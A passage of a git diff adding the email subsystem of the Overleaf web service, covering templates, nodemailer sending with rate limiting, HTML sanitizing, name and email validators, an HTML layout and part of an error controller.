`${settings.siteUrl}/learn/how-to/Sharing_a_project?utm_source=overleaf&utm_medium=email&utm_campaign=onboarding`, + isPlainText + ) + const siteLink = EmailMessageHelper.displayLink( + 'www.overleaf.com', + settings.siteUrl, + isPlainText + ) + const userSettingsLink = EmailMessageHelper.displayLink( + 'here', + `${settings.siteUrl}/user/email-preferences`, + isPlainText + ) + const onboardingSurveyLink = EmailMessageHelper.displayLink( + 'Join our user feedback program', + 'https://forms.gle/DB7pdk2B1VFQqVVB9', + isPlainText + ) + return [ + `Thanks for signing up for ${settings.appName} recently. We hope you've been finding it useful! Here are some key features to help you get the most out of the service:`, + `${learnLatexLink}: In this tutorial we provide a quick and easy first introduction to LaTeX with no prior knowledge required. By the time you are finished, you will have written your first LaTeX document!`, + `${templatesLinks}: If you're looking for a template or example to get started, we've a large selection available in our template gallery, including CVs, project reports, journal articles and more.`, + `${collaboratorsLink}: One of the key features of Overleaf is the ability to share projects and collaborate on them with other users. Find out how to share your projects with your colleagues in this quick how-to guide.`, + `${onboardingSurveyLink} to help us make Overleaf even better!`, + 'Thanks again for using Overleaf :)', + `Lee`, + `Lee Shalit<br />CEO<br />${siteLink}<hr>`, + `You're receiving this email because you've recently signed up for an Overleaf account. If you've previously subscribed to emails about product offers and company news and events, you can unsubscribe ${userSettingsLink}.`, + ] + }, +}) + +templates.securityAlert = NoCTAEmailTemplate({ + subject(opts) { + return `Overleaf security note: ${opts.action}` + }, + title(opts) { + return opts.action.charAt(0).toUpperCase() + opts.action.slice(1) + }, + message(opts, isPlainText) { + const dateFormatted = moment().format('dddd D MMMM YYYY') + const timeFormatted = moment().format('HH:mm') + const helpLink = EmailMessageHelper.displayLink( + 'quick guide', + `${settings.siteUrl}/learn/how-to/Keeping_your_account_secure`, + isPlainText + ) + + const actionDescribed = EmailMessageHelper.cleanHTML( + opts.actionDescribed, + isPlainText + ) + + if (!opts.message) { + opts.message = [] + } + const message = opts.message.map(m => { + return EmailMessageHelper.cleanHTML(m, isPlainText) + }) + + return [ + `We are writing to let you know that ${actionDescribed} on ${dateFormatted} at ${timeFormatted} GMT.`, + ...message, + `If this was you, you can ignore this email.`, + `If this was not you, we recommend getting in touch with our support team at ${settings.adminEmail} to report this as potentially suspicious activity on your account.`, + `We also encourage you to read our ${helpLink} to keeping your ${settings.appName} account safe.`, + ] + }, +}) + +templates.SAMLDataCleared = ctaTemplate({ + subject(opts) { + return `Institutional Login No Longer Linked - ${settings.appName}` + }, + title(opts) { + return 'Institutional Login No Longer Linked' + }, + message(opts, isPlainText) { + return [ + `We're writing to let you know that due to a bug on our end, we've had to temporarily disable logging into your ${settings.appName} through your institution.`, + `To get it going again, you'll need to relink your institutional email address to your ${settings.appName} account via your settings.`, + ] + }, + secondaryMessage() { + return [ + `If you ordinarily log in to your ${settings.appName} account through your institution, you may need to set or reset your password to regain access to your account first.`, + 'This bug did not affect the security of any accounts, but it may have affected license entitlements for a small number of users. We are sorry for any inconvenience that this may cause for you.', + `If you have any questions, please get in touch with our support team at ${settings.adminEmail} or by replying to this email.`, + ] + }, + ctaText(opts) { + return 'Update my Emails and Affiliations' + }, + ctaURL(opts) { + return `${settings.siteUrl}/user/settings` + }, +}) + +templates.welcome = ctaTemplate({ + subject() { + return `Welcome to ${settings.appName}` + }, + title() { + return `Welcome to ${settings.appName}` + }, + greeting() { + return 'Hi,' + }, + message(opts, isPlainText) { + const logInAgainDisplay = EmailMessageHelper.displayLink( + 'log in again', + `${settings.siteUrl}/login`, + isPlainText + ) + const helpGuidesDisplay = EmailMessageHelper.displayLink( + 'Help Guides', + `${settings.siteUrl}/learn`, + isPlainText + ) + const templatesDisplay = EmailMessageHelper.displayLink( + 'Templates', + `${settings.siteUrl}/templates`, + isPlainText + ) + + return [ + `Thanks for signing up to ${settings.appName}! If you ever get lost, you can ${logInAgainDisplay} with the email address '${opts.to}'.`, + `If you're new to LaTeX, take a look at our ${helpGuidesDisplay} and ${templatesDisplay}.`, + `Please also take a moment to confirm your email address for ${settings.appName}:`, + ] + }, + secondaryMessage() { + return [ + `PS. We love talking to our users about ${settings.appName}. Reply to this email to get in touch with us directly, whatever the reason. Questions, comments, problems, suggestions, all welcome!`, + ] + }, + ctaText() { + return 'Confirm Email' + }, + ctaURL(opts) { + return opts.confirmEmailUrl + }, +}) + +templates.welcomeWithoutCTA = NoCTAEmailTemplate({ + subject() { + return `Welcome to ${settings.appName}` + }, + title() { + return `Welcome to ${settings.appName}` + }, + greeting() { + return 'Hi,' + }, + message(opts, isPlainText) { + const logInAgainDisplay = EmailMessageHelper.displayLink( + 'log in again', + `${settings.siteUrl}/login`, + isPlainText + ) + const helpGuidesDisplay = EmailMessageHelper.displayLink( + 'Help Guides', + `${settings.siteUrl}/learn`, + isPlainText + ) + const templatesDisplay = EmailMessageHelper.displayLink( + 'Templates', + `${settings.siteUrl}/templates`, + isPlainText + ) + + return [ + `Thanks for signing up to ${settings.appName}! If you ever get lost, you can ${logInAgainDisplay} with the email address '${opts.to}'.`, + `If you're new to LaTeX, take a look at our ${helpGuidesDisplay} and ${templatesDisplay}.`, + `PS. We love talking to our users about ${settings.appName}. Reply to this email to get in touch with us directly, whatever the reason. Questions, comments, problems, suggestions, all welcome!`, + ] + }, +}) + +function _formatUserNameAndEmail(user, placeholder) { + if (user.first_name && user.last_name) { + const fullName = `${user.first_name} ${user.last_name}` + if (SpamSafe.isSafeUserName(fullName)) { + if (SpamSafe.isSafeEmail(user.email)) { + return `${fullName} (${user.email})` + } else { + return fullName + } + } + } + return SpamSafe.safeEmail(user.email, placeholder) +} + +module.exports = { + templates, + ctaTemplate, + NoCTAEmailTemplate, + buildEmail, +} diff --git a/services/web/app/src/Features/Email/EmailHandler.js b/services/web/app/src/Features/Email/EmailHandler.js new file mode 100644 index 0000000..f38ce2c --- /dev/null +++ b/services/web/app/src/Features/Email/EmailHandler.js @@ -0,0 +1,41 @@ +const { callbackify } = require('util') +const Settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') +const EmailBuilder = require('./EmailBuilder') +const EmailSender = require('./EmailSender') +const Queues = require('../../infrastructure/Queues') + +const EMAIL_SETTINGS = Settings.email || {} + +/** + * @param {string} emailType + * @param {opts} any + */ +async function sendEmail(emailType, opts) { + const email = EmailBuilder.buildEmail(emailType, opts) + if (email.type === 'lifecycle' && !EMAIL_SETTINGS.lifecycle) { + return + } + opts.html = email.html + opts.text = email.text + opts.subject = email.subject + await EmailSender.promises.sendEmail(opts, emailType) +} + +function sendDeferredEmail(emailType, opts, delay) { + Queues.createScheduledJob( + 'deferred-emails', + { data: { emailType, opts } }, + delay + ).catch(err => { + logger.warn({ err, emailType, opts }, 'failed to queue deferred email') + }) +} + +module.exports = { + sendEmail: callbackify(sendEmail), + sendDeferredEmail, + promises: { + sendEmail, + }, +} diff --git a/services/web/app/src/Features/Email/EmailMessageHelper.js b/services/web/app/src/Features/Email/EmailMessageHelper.js new file mode 100644 index 0000000..d8fcc7d --- /dev/null +++ b/services/web/app/src/Features/Email/EmailMessageHelper.js @@ -0,0 +1,28 @@ +const sanitizeHtml = require('sanitize-html') +const sanitizeOptions = { + html: { + allowedTags: ['a', 'span', 'b', 'br', 'i'], + allowedAttributes: { + a: ['href', 'style'], + span: ['style', 'class'], + }, + }, + plainText: { + allowedTags: [], + allowedAttributes: {}, + }, +} + +function cleanHTML(text, isPlainText) { + if (!isPlainText) return sanitizeHtml(text, sanitizeOptions.html) + return sanitizeHtml(text, sanitizeOptions.plainText) +} + +function displayLink(text, url, isPlainText) { + return isPlainText ? `${text} (${url})` : `<a href="${url}">${text}</a>` +} + +module.exports = { + cleanHTML, + displayLink, +} diff --git a/services/web/app/src/Features/Email/EmailOptionsHelper.js b/services/web/app/src/Features/Email/EmailOptionsHelper.js new file mode 100644 index 0000000..e8245f7 --- /dev/null +++ b/services/web/app/src/Features/Email/EmailOptionsHelper.js @@ -0,0 +1,29 @@ +function _getIndefiniteArticle(providerName) { + const vowels = ['a', 'e', 'i', 'o', 'u'] + + return vowels.includes(providerName.charAt(0).toLowerCase()) ? 'an' : 'a' +} + +function _actionBuilder(providerName, action, accountLinked) { + if (providerName.toLowerCase() !== 'google') { + return `${providerName} account ${action}` + } + + return accountLinked ? `New account ${action}` : `Account ${action}` +} + +function linkOrUnlink(accountLinked, providerName, email) { + const action = accountLinked ? 'linked' : 'no longer linked' + const actionDescribed = accountLinked ? 'was linked to' : 'was unlinked from' + const indefiniteArticle = _getIndefiniteArticle(providerName) + + return { + to: email, + action: _actionBuilder(providerName, action, accountLinked), + actionDescribed: `${indefiniteArticle} ${providerName} account ${actionDescribed} your account ${email}`, + } +} + +module.exports = { + linkOrUnlink, +} diff --git a/services/web/app/src/Features/Email/EmailSender.js b/services/web/app/src/Features/Email/EmailSender.js new file mode 100644 index 0000000..c11369c --- /dev/null +++ b/services/web/app/src/Features/Email/EmailSender.js @@ -0,0 +1,128 @@ +const { callbackify } = require('util') +const logger = require('@overleaf/logger') +const metrics = require('@overleaf/metrics') +const Settings = require('@overleaf/settings') +const nodemailer = require('nodemailer') +const sesTransport = require('nodemailer-ses-transport') +const OError = require('@overleaf/o-error') +const { RateLimiter } = require('../../infrastructure/RateLimiter') +const _ = require('lodash') + +const EMAIL_SETTINGS = Settings.email || {} + +module.exports = { + sendEmail: callbackify(sendEmail), + promises: { + sendEmail, + }, +} + +const client = getClient() + +const rateLimiter = new RateLimiter('send_email', { + points: 100, + duration: 3 * 60 * 60, +}) + +function getClient() { + let client + if (EMAIL_SETTINGS.parameters) { + const emailParameters = EMAIL_SETTINGS.parameters + if (emailParameters.AWSAccessKeyID || EMAIL_SETTINGS.driver === 'ses') { + logger.debug('using aws ses for email') + client = nodemailer.createTransport(sesTransport(emailParameters)) + } else if (emailParameters.sendgridApiKey) { + throw new OError( + 'sendgridApiKey configuration option is deprecated, use SMTP instead' + ) + } else if (emailParameters.MandrillApiKey) { + throw new OError( + 'MandrillApiKey configuration option is deprecated, use SMTP instead' + ) + } else { + logger.debug('using smtp for email') + const smtp = _.pick( + emailParameters, + 'host', + 'port', + 'secure', + 'auth', + 'ignoreTLS', + 'logger', + 'name' + ) + client = nodemailer.createTransport(smtp) + } + } else { + logger.warn( + 'Email transport and/or parameters not defined. No emails will be sent.' + ) + client = { + async sendMail(options) { + logger.info({ options }, 'Would send email if enabled.') + }, + } + } + return client +} + +async function sendEmail(options, emailType) { + try { + const canContinue = await checkCanSendEmail(options) + metrics.inc('email_status', { + status: canContinue ? 'sent' : 'rate_limited', + path: emailType, + }) + if (!canContinue) { + logger.debug( + { + sendingUserId: options.sendingUser_id, + to: options.to, + subject: options.subject, + canContinue, + }, + 'rate limit hit for sending email, not sending' + ) + throw new OError('rate limit hit sending email') + } + metrics.inc('email') + const sendMailOptions = { + to: options.to, + from: EMAIL_SETTINGS.fromAddress || '', + subject: options.subject, + html: options.html, + text: options.text, + replyTo: options.replyTo || EMAIL_SETTINGS.replyToAddress, + socketTimeout: 30 * 1000, + } + if (EMAIL_SETTINGS.textEncoding != null) { + sendMailOptions.textEncoding = EMAIL_SETTINGS.textEncoding + } + if (options.category) { + // category support for sendgrid + sendMailOptions.headers = { + 'X-SMTPAPI': JSON.stringify({ category: options.category }), + } + } + await client.sendMail(sendMailOptions) + } catch (err) { + throw new OError('error sending message').withCause(err) + } +} + +async function checkCanSendEmail(options) { + if (options.sendingUser_id == null) { + // email not sent from user, not rate limited + return true + } + try { + await rateLimiter.consume(options.sendingUser_id, 1, { method: 'userId' }) + } catch (err) { + if (err instanceof Error) { + throw err + } else { + return false + } + } + return true +} diff --git a/services/web/app/src/Features/Email/Layouts/BaseWithHeaderEmailLayout.js b/services/web/app/src/Features/Email/Layouts/BaseWithHeaderEmailLayout.js new file mode 100644 index 0000000..11546e7 --- /dev/null +++ b/services/web/app/src/Features/Email/Layouts/BaseWithHeaderEmailLayout.js @@ -0,0 +1,394 @@ +const _ = require('lodash') +const settings = require('@overleaf/settings') + +module.exports = _.template(`\ +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" +"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> + +<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" style="Margin: 0; background: #E4E8EE !important; margin: 0; min-height: 100%; padding: 0;"> + <head> + <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> + <meta name="viewport" content="width=device-width"> + <style>.button td { + border-radius: 9999px; } + +.force-overleaf-style a, +.force-overleaf-style a[href] { + color: #138A07 !important; + text-decoration: none !important; + -moz-hyphens: none; + -ms-hyphens: none; + -webkit-hyphens: none; + hyphens: none; } + .force-overleaf-style a:visited, + .force-overleaf-style a[href]:visited { + color: #138A07; } + .force-overleaf-style a:hover, + .force-overleaf-style a[href]:hover { + color: #3d7935; } + .force-overleaf-style a:active, + .force-overleaf-style a[href]:active { + color: #3d7935; } +</style> + <style>@media only screen { + html { + min-height: 100%; + background: #f6f6f6; + } +} + +@media only screen and (max-width: 596px) { + .small-float-center { + margin: 0 auto !important; + float: none !important; + text-align: center !important; + } + + .small-text-center { + text-align: center !important; + } + + .small-text-left { + text-align: left !important; + } + + .small-text-right { + text-align: right !important; + } + + .cta-table { + table-layout: fixed; + } +} + +@media only screen and (max-width: 596px) { + .hide-for-large { + display: block !important; + width: auto !important; + overflow: visible !important; + max-height: none !important; + font-size: inherit !important; + line-height: inherit !important; + } +} + +@media only screen and (max-width: 596px) { + table.body table.container .hide-for-large, + table.body table.container .row.hide-for-large { + display: table !important; + width: 100% !important; + } +} + +@media only screen and (max-width: 596px) { + table.body table.container .callout-inner.hide-for-large { + display: table-cell !important; + width: 100% !important; + } +} + +@media only screen and (max-width: 596px) { + table.body table.container .show-for-large { + display: none !important; + width: 0; + mso-hide: all; + overflow: hidden; + } +} + +@media only screen and (max-width: 596px) { + table.body img { + width: auto; + height: auto; + } + + table.body center { + min-width: 0 !important; + } + + table.body .container { + width: 95% !important; + } + + table.body .columns, + table.body .column { + height: auto !important; + -moz-box-sizing: border-box; + -webkit-box-sizing: border-box; + box-sizing: border-box; + padding-left: 16px !important; + padding-right: 16px !important; + } + + table.body .columns .column, + table.body .columns .columns, + table.body .column .column, + table.body .column .columns { + padding-left: 0 !important; + padding-right: 0 !important; + } + + table.body .collapse .columns, + table.body .collapse .column { + padding-left: 0 !important; + padding-right: 0 !important; + } + + td.small-1, + th.small-1 { + display: inline-block !important; + width: 8.33333% !important; + } + + td.small-2, + th.small-2 { + display: inline-block !important; + width: 16.66667% !important; + } + + td.small-3, + th.small-3 { + display: inline-block !important; + width: 25% !important; + } + + td.small-4, + th.small-4 { + display: inline-block !important; + width: 33.33333% !important; + } + + td.small-5, + th.small-5 { + display: inline-block !important; + width: 41.66667% !important; + } + + td.small-6, + th.small-6 { + display: inline-block !important; + width: 50% !important; + } + + td.small-7, + th.small-7 { + display: inline-block !important; + width: 58.33333% !important; + } + + td.small-8, + th.small-8 { + display: inline-block !important; + width: 66.66667% !important; + } + + td.small-9, + th.small-9 { + display: inline-block !important; + width: 75% !important; + } + + td.small-10, + th.small-10 { + display: inline-block !important; + width: 83.33333% !important; + } + + td.small-11, + th.small-11 { + display: inline-block !important; + width: 91.66667% !important; + } + + td.small-12, + th.small-12 { + display: inline-block !important; + width: 100% !important; + } + + .columns td.small-12, + .column td.small-12, + .columns th.small-12, + .column th.small-12 { + display: block !important; + width: 100% !important; + } + + table.body td.small-offset-1, + table.body th.small-offset-1 { + margin-left: 8.33333% !important; + Margin-left: 8.33333% !important; + } + + table.body td.small-offset-2, + table.body th.small-offset-2 { + margin-left: 16.66667% !important; + Margin-left: 16.66667% !important; + } + + table.body td.small-offset-3, + table.body th.small-offset-3 { + margin-left: 25% !important; + Margin-left: 25% !important; + } + + table.body td.small-offset-4, + table.body th.small-offset-4 { + margin-left: 33.33333% !important; + Margin-left: 33.33333% !important; + } + + table.body td.small-offset-5, + table.body th.small-offset-5 { + margin-left: 41.66667% !important; + Margin-left: 41.66667% !important; + } + + table.body td.small-offset-6, + table.body th.small-offset-6 { + margin-left: 50% !important; + Margin-left: 50% !important; + } + + table.body td.small-offset-7, + table.body th.small-offset-7 { + margin-left: 58.33333% !important; + Margin-left: 58.33333% !important; + } + + table.body td.small-offset-8, + table.body th.small-offset-8 { + margin-left: 66.66667% !important; + Margin-left: 66.66667% !important; + } + + table.body td.small-offset-9, + table.body th.small-offset-9 { + margin-left: 75% !important; + Margin-left: 75% !important; + } + + table.body td.small-offset-10, + table.body th.small-offset-10 { + margin-left: 83.33333% !important; + Margin-left: 83.33333% !important; + } + + table.body td.small-offset-11, + table.body th.small-offset-11 { + margin-left: 91.66667% !important; + Margin-left: 91.66667% !important; + } + + table.body table.columns td.expander, + table.body table.columns th.expander { + display: none !important; + } + + table.body .right-text-pad, + table.body .text-pad-right { + padding-left: 10px !important; + } + + table.body .left-text-pad, + table.body .text-pad-left { + padding-right: 10px !important; + } + + table.menu { + width: 100% !important; + } + + table.menu td, + table.menu th { + width: auto !important; + display: inline-block !important; + } + + table.menu.vertical td, + table.menu.vertical th, + table.menu.small-vertical td, + table.menu.small-vertical th { + display: block !important; + } + + table.menu[align="center"] { + width: auto !important; + } + + table.button.small-expand, + table.button.small-expanded { + width: 100% !important; + } + + table.button.small-expand table, + table.button.small-expanded table { + width: 100%; + } + + table.button.small-expand table a, + table.button.small-expanded table a { + text-align: center !important; + width: 100% !important; + padding-left: 0 !important; + padding-right: 0 !important; + } + + table.button.small-expand center, + table.button.small-expanded center { + min-width: 0; + } +}</style> + </head> + <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" bgcolor="#F6F6F6" style="-moz-box-sizing: border-box; -ms-text-size-adjust: 100%; -webkit-box-sizing: border-box; -webkit-text-size-adjust: 100%; Margin: 0; box-sizing: border-box; color: #5D6879; font-family: Helvetica, Arial, sans-serif; font-size: 16px; font-weight: normal; line-height: 1.3; margin: 0; min-width: 100%; padding: 0; text-align: left; width: 100% !important;"> + <!-- <span class="preheader"></span> --> + <table class="body" border="0" cellspacing="0" cellpadding="0" width="100%" height="100%" style="Margin: 0; background: #E4E8EE; border-collapse: collapse; border-spacing: 0; color: #5D6879; font-family: Helvetica, Arial, sans-serif; font-size: 16px; font-weight: normal; height: 100%; line-height: 1.3; margin: 0; padding: 0; text-align: left; vertical-align: top; width: 100%;"> + <tr style="padding: 0; text-align: left; vertical-align: top;"> + <td class="body-cell" align="center" valign="top" bgcolor="#F6F6F6" style="-moz-hyphens: auto; -webkit-hyphens: auto; Margin: 0; background: #E4E8EE !important; border-collapse: collapse !important; color: #5D6879; font-family: Helvetica, Arial, sans-serif; font-size: 16px; font-weight: normal; hyphens: auto; line-height: 1.3; margin: 0; padding: 0; padding-bottom: 20px; text-align: left; vertical-align: top; word-wrap: break-word;"> + <center data-parsed="" style="min-width: 580px; width: 100%;"> + + <table align="center" class="wrapper header float-center" style="Margin: 0 auto; background: #1E2530; border-bottom: none; border-collapse: collapse; border-spacing: 0; float: none; margin: 0 auto; padding: 0; text-align: center; vertical-align: top; width: 100%;"><tr style="padding: 0; text-align: left; vertical-align: top;"><td class="wrapper-inner" style="-moz-hyphens: auto; -webkit-hyphens: auto; Margin: 0; border-collapse: collapse !important; color: #5D6879; font-family: Helvetica, Arial, sans-serif; font-size: 16px; font-weight: normal; hyphens: auto; line-height: 1.3; margin: 0; padding: 20px; text-align: left; vertical-align: top; word-wrap: break-word;"> + <table align="center" class="container" style="Margin: 0 auto; background: transparent; border-collapse: collapse; border-spacing: 0; margin: 0 auto; padding: 0; text-align: inherit; vertical-align: top; width: 580px;"><tbody><tr style="padding: 0; text-align: left; vertical-align: top;"><td style="-moz-hyphens: auto; -webkit-hyphens: auto; Margin: 0; border-collapse: collapse !important; color: #5D6879; font-family: Helvetica, Arial, sans-serif; font-size: 16px; font-weight: normal; hyphens: auto; line-height: 1.3; margin: 0; padding: 0; text-align: left; vertical-align: top; word-wrap: break-word;"> + <table class="row collapse" style="border-collapse: collapse; border-spacing: 0; display: table; padding: 0; position: relative; text-align: left; vertical-align: top; width: 100%;"><tbody><tr style="padding: 0; text-align: left; vertical-align: top;"> + <th class="small-12 large-12 columns first last" style="Margin: 0 auto; color: #5D6879; font-family: Helvetica, Arial, sans-serif; font-size: 16px; font-weight: normal; line-height: 1.3; margin: 0 auto; padding: 0; padding-bottom: 0; padding-left: 0; padding-right: 0; text-align: left; width: 588px;"><table style="border-collapse: collapse; border-spacing: 0; padding: 0; text-align: left; vertical-align: top; width: 100%;"><tr style="padding: 0; text-align: left; vertical-align: top;"><th style="Margin: 0; color: #5D6879; font-family: Helvetica, Arial, sans-serif; font-size: 16px; font-weight: normal; line-height: 1.3; margin: 0; padding: 0; text-align: left;"> + <h1 style="Margin: 0; Margin-bottom: px; color: #FFFFFF; font-family: Georgia, serif; font-size: 30px; font-weight: normal; line-height: 1.3; margin: 0; margin-bottom: px; padding: 0; text-align: left; word-wrap: normal;"> + ${settings.appName} + </h1> + </th> + <th class="expander" style="Margin: 0; color: #5D6879; font-family: Helvetica, Arial, sans-serif; font-size: 16px; font-weight: normal; line-height: 1.3; margin: 0; padding: 0 !important; text-align: left; visibility: hidden; width: 0;"></th></tr></table></th> + </tr></tbody></table> + </td></tr></tbody></table> + </td></tr></table> + <table class="spacer float-center" style="Margin: 0 auto; border-collapse: collapse; border-spacing: 0; float: none; margin: 0 auto; padding: 0; text-align: center; vertical-align: top; width: 100%;"><tbody><tr style="padding: 0; text-align: left; vertical-align: top;"><td height="20px" style="-moz-hyphens: auto; -webkit-hyphens: auto; Margin: 0; border-collapse: collapse !important; color: #5D6879; font-family: Helvetica, Arial, sans-serif; font-size: 20px; font-weight: normal; hyphens: auto; line-height: 20px; margin: 0; mso-line-height-rule: exactly; padding: 0; text-align: left; vertical-align: top; word-wrap: break-word;"> </td></tr></tbody></table> + <table align="center" class="container main float-center" style="Margin: 0 auto; Margin-top: 10px; background: #FFFFFF; border-collapse: collapse; border-spacing: 0; float: none; margin: 0 auto; margin-top: 10px; padding: 0; text-align: center; vertical-align: top; width: 580px;"><tbody><tr style="padding: 0; text-align: left; vertical-align: top;"><td style="-moz-hyphens: auto; -webkit-hyphens: auto; Margin: 0; border-collapse: collapse !important; color: #5D6879; font-family: Helvetica, Arial, sans-serif; font-size: 16px; font-weight: normal; hyphens: auto; line-height: 1.3; margin: 0; padding: 0; text-align: left; vertical-align: top; word-wrap: break-word;"> + <table class="spacer" style="border-collapse: collapse; border-spacing: 0; padding: 0; text-align: left; vertical-align: top; width: 100%;"><tbody><tr style="padding: 0; text-align: left; vertical-align: top;"><td height="20px" style="-moz-hyphens: auto; -webkit-hyphens: auto; Margin: 0; border-collapse: collapse !important; color: #5D6879; font-family: Helvetica, Arial, sans-serif; font-size: 20px; font-weight: normal; hyphens: auto; line-height: 20px; margin: 0; mso-line-height-rule: exactly; padding: 0; text-align: left; vertical-align: top; word-wrap: break-word;"> </td></tr></tbody></table> + + <%= body %> + + <table class="wrapper secondary" align="center" style="background: #E4E8EE; border-collapse: collapse; border-spacing: 0; padding: 0; text-align: left; vertical-align: top; width: 100%;"><tr style="padding: 0; text-align: left; vertical-align: top;"><td class="wrapper-inner" style="-moz-hyphens: auto; -webkit-hyphens: auto; Margin: 0; border-collapse: collapse !important; color: #5D6879; font-family: Helvetica, Arial, sans-serif; font-size: 16px; font-weight: normal; hyphens: auto; line-height: 1.3; margin: 0; padding: 0; text-align: left; vertical-align: top; word-wrap: break-word;"> + <table class="spacer" style="border-collapse: collapse; border-spacing: 0; padding: 0; text-align: left; vertical-align: top; width: 100%;"><tbody><tr style="padding: 0; text-align: left; vertical-align: top;"><td height="10px" style="-moz-hyphens: auto; -webkit-hyphens: auto; Margin: 0; border-collapse: collapse !important; color: #5D6879; font-family: Helvetica, Arial, sans-serif; font-size: 10px; font-weight: normal; hyphens: auto; line-height: 10px; margin: 0; mso-line-height-rule: exactly; padding: 0; text-align: left; vertical-align: top; word-wrap: break-word;"> </td></tr></tbody></table> + <p style="Margin: 0; Margin-bottom: 10px; color: #5D6879; font-family: Helvetica, Arial, sans-serif; font-size: 16px; font-weight: normal; line-height: 1.3; margin: 0; margin-bottom: 10px; padding: 0; text-align: left;"><small style="color: #5D6879; font-size: 80%;"> + ${ + settings.email && + settings.email.template && + settings.email.template.customFooter + ? `${settings.email.template.customFooter}<br>` + : '' + }${settings.appName} • <a href="${ + settings.siteUrl + }" style="Margin: 0; color: #0F7A06; font-family: Helvetica, Arial, sans-serif; font-weight: normal; line-height: 1.3; margin: 0; padding: 0; text-align: left; text-decoration: none;">${ + settings.siteUrl + }</a> + </small></p> + </td></tr></table> + </td></tr></tbody></table> + + </center> + </td> + </tr> + </table> + <!-- prevent Gmail on iOS font size manipulation --> + <div style="display:none; white-space:nowrap; font:15px courier; line-height:0;">                                                             </div> + </body> +</html>\ +`) diff --git a/services/web/app/src/Features/Email/SpamSafe.js b/services/web/app/src/Features/Email/SpamSafe.js new file mode 100644 index 0000000..1198099 --- /dev/null +++ b/services/web/app/src/Features/Email/SpamSafe.js @@ -0,0 +1,56 @@ +const XRegExp = require('xregexp') + +// A note about SAFE_REGEX: +// We have to escape the escape characters because XRegExp compiles it first. +// So it's equivalent to `^[\p{L}\p{N}\s\-_!&\(\)]+$] +// \p{L} = any letter in any language +// \p{N} = any kind of numeric character +// https://www.regular-expressions.info/unicode.html#prop is a good resource for +// more obscure regex features. standard RegExp does not support these + +const HAN_REGEX = XRegExp('\\p{Han}') +const SAFE_REGEX = XRegExp("^[\\p{L}\\p{N}\\s\\-_!'&\\(\\)]+$") +const EMAIL_REGEX = XRegExp('^[\\p{L}\\p{N}.+_-]+@[\\w.-]+$') + +const SpamSafe = { + isSafeUserName(name) { + return SAFE_REGEX.test(name) && name.length <= 30 + }, + + isSafeProjectName(name) { + if (HAN_REGEX.test(name)) { + return SAFE_REGEX.test(name) && name.length <= 10 + } + return SAFE_REGEX.test(name) && name.length <= 100 + }, + + isSafeEmail(email) { + return EMAIL_REGEX.test(email) && email.length <= 40 + }, + + safeUserName(name, alternative, project) { + if (project == null) { + project = false + } + if (SpamSafe.isSafeUserName(name)) { + return name + } + return alternative + }, + + safeProjectName(name, alternative) { + if (SpamSafe.isSafeProjectName(name)) { + return name + } + return alternative + }, + + safeEmail(email, alternative) { + if (SpamSafe.isSafeEmail(email)) { + return email + } + return alternative + }, +} + +module.exports = SpamSafe diff --git a/services/web/app/src/Features/Errors/ErrorController.js b/services/web/app/src/Features/Errors/ErrorController.js new file mode 100644 index 0000000..b7f96a8 --- /dev/null +++ b/services/web/app/src/Features/Errors/ErrorController.js @@ -0,0 +1,133 @@ +const Errors = require('./Errors') +const SessionManager = require('../Authentication/SessionManager') +const SamlLogHandler = require('../SamlLog/SamlLogHandler') +const HttpErrorHandler = require('./HttpErrorHandler') +const { plainTextResponse } = require('../../infrastructure/Response') +const { expressifyErrorHandler } = require('@overleaf/promise-utils') + +function notFound(req, res) { + res.status(404) + res.render('general/404', { title: 'page_not_found' }) +} + +function forbidden(req, res) { + res.status(403) + res.render('user/restricted') +} + +function serverError(req, res) { + res.status(500) + res.render('general/500', { title: 'Server Error' }) +} + +async function handleError(error, req, res, next) { + const shouldSendErrorResponse = !res.headersSent + const user = SessionManager.getSessionUser(req.session) + req.logger.addFields({ err: error }) + // log errors related to SAML flow + if (req.session && req.session.saml) { + req.logger.setLevel('error') + await SamlLogHandler.promises.log(req, { error }) + } + if (error.code === 'EBADCSRFTOKEN') { + req.logger.addFields({ user }) + req.logger.setLevel('warn') + if (shouldSendErrorResponse) { + res.sendStatus(403) + } + } else if (error instanceof Errors.NotFoundError) { + req.logger.setLevel('warn') + if (shouldSendErrorResponse) { + notFound(req, res) + } + } else if ( + error instanceof URIError && + error.message.match(/^Failed to decode param/) + ) { + req.logger.setLevel('warn') + if (shouldSendErrorResponse) { + res.status(400) + res.render('general/500', { title: 'Invalid Error' }) + } + } else if (error instanceof Errors.ForbiddenError) { + req.logger.setLevel('warn') + if (shouldSendErrorResponse) { + forbidden(req, res) + } + } else if (error instanceof Errors.TooManyRequestsError) { + req.logger.setLevel('warn') + if (shouldSendErrorResponse) { + res.sendStatus(429) + } + } else if (error instanceof Errors.InvalidError) { + req.logger.setLevel('warn') + if (shouldSendErrorResponse) { + res.status(400) + plainTextResponse(res, error.message) + } + } else if (error instanceof Errors.DuplicateNameError) { + req.logger.setLevel('warn') + if (shouldSendErrorResponse) { + res.status(400) + plainTextResponse(res, error.message) + } + } else if (error instanceof Errors.InvalidNameError) { + req.logger.setLevel('warn') + if (shouldSendErrorResponse) { + res.status(400) + plainTextResponse(res, error.message) + } + } else if (error instanceof Errors.NonDeletableEntityError) { + req.logger.setLevel('warn') + if (shouldSendErrorResponse) { + res.status(422) + plainTextResponse(res, error.message) + } + } else if (error instanceof Errors.SAMLSessionDataMissing) { + req.logger.setLevel('warn') + if (shouldSendErrorResponse) { + HttpErrorHandler.badRequest(req, res, error.message) + } + } else { + req.logger.setLevel('error') + if (shouldSendErrorResponse) { + serverError(req, res) + } + } + if (!shouldSendErrorResponse) { + // Pass the error to the default Express error handler, which will close + // the connection. + next(error) + } +} + +function handleApiError(err, req, res, next) { + req.logger.addFields({ err }) + if (err instanceof Errors.NotFoundError) { + req.logger.setLevel('warn') + res.sendStatus(404) + } else if ( + err instanceof URIError && + err.message.match(/^Failed to decode param/) + ) { + req.logger.setLevel('warn') + res.sendStatus(400) + } else if (err instanceof Errors.TooManyRequestsError) { + req.logger.setLevel('warn') + res.sendStatus(429) + } else if (err instanceof Errors.ForbiddenError) { + req.logger.setLevel('warn') + res.sendStatus(403) + } else { + req.logger.setLevel('error') + 